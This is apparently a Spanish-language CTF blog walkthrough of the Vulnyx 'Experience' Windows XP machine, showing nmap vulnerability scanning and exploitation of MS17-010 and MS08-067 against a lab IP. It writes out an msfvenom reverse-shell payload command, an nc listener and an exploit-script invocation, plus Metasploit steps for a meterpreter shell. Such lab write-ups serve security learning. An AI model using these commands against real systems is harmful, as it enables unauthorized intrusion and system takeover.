Skip to main content
HashnodeHumano, demasiado humano

Command Palette

Search for a command to run...

Experience - Vulnyx Machine

Resolución de la maquina Experience de Vulnyx

Updated
2 min read
B
blackpist0l
Part of seriesCTF

Hola, una vez mas tenemos otro CTF 😃

Gracias al creador de la maquina d4t4s3c y a la comunidad de Vulnyx por hacer esto posible.

Keanu Reeves GIF - Keanu Reeves Thank - Discover & Share GIFs

Descripción de la maquina.

Sistema Operativo

Windows

Dificultad

Muy Fácil

Lanzamiento

21/01/2024

Creador

d4t4s3c

Primer Usuario

suraxddq

Primer Root

suraxddq

Enumeración

Escaneo de puertos y servicios, bien despachado...

En efecto es una maquina Windows XP, vamos a enumerar mas el SMB... Al ser una maquina vieja puede que allá vulnerabilidades ya conocidas, por esto mismo realice otro tipo de escaneo con nmap.

Podemos lanzar toda la categoría de scripts de identificación de vulnerabilidades de nmap con:

 sudo nmap -p445 --script "vuln" 192.168.10.6 -oN vulnsnmap

nmap tiene otras categorías interesante, aquí puedes saber mas sobre estas.

Y vaya, tenemos algunas vulnerabilidades, se ve bien la MS17-010 y MS08-067 ¿las conoces? Son vulnerabilidades bastante criticas, con fácil explotación, ya que existen diversos exploits y al ser ejecutadas ante un activo obtienes un nivel de privilegios como NT AUTHORITY\SYSTEM.

MS17-010

Existe un exploit dentro de la suit de metasploit, pero esto no funciona para activos de 32 bits, dicho esto veremos otro exploit el cual si lo hace.

Empecemos por clonar un repositorio de github.

git clone https://github.com/helviojunior/MS17-010
cd MS17-010

Generamos un binario con la shell reversa, con msfvenom

 msfvenom -p windows/shell_reverse_tcp LHOST=192.168.10.7 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o ms17-010.exe

Nos colocamos en escucha...

rlwrap nc -nlvp 443

Por ultimo, debe de ejecutar el archivo send_and_execute.py con python2.

python2 send_and_execute.py 192.168.10.6 ms17-010.exe

Una vez dentro, pues, es todo.

Windows Xp GIF - Windows Xp - Descubre y comparte GIF

MS08-067

Para explotarlo con esta vulnerabilidad, sera mas sencillo que el anterior ya que metasploit si cuenta con el exploit. 🙂

msfconsole

Buscamos...

Usamos, por defecto se nos cargara un payload para la shell reversa con meterpreter, asi que lo dejamos...

Ahora tan solo nos falta colocar la IP del la maquina victima.

Y listo, algo bastante tranquilo, ¡nos vemos joven lector!

La cabra es el nuevo gato | Grazia

Referencias

#ctf-writeup#vulnyx
160 views

Comments

Join the discussion

No comments yet. Be the first to comment.

CTF

Part 9 of 30
Up next

Ethernal - Vulnyx Machine

Resolución de la maquina Ethernal de Vulnyx

More from this blog

Humano, demasiado humano

35 posts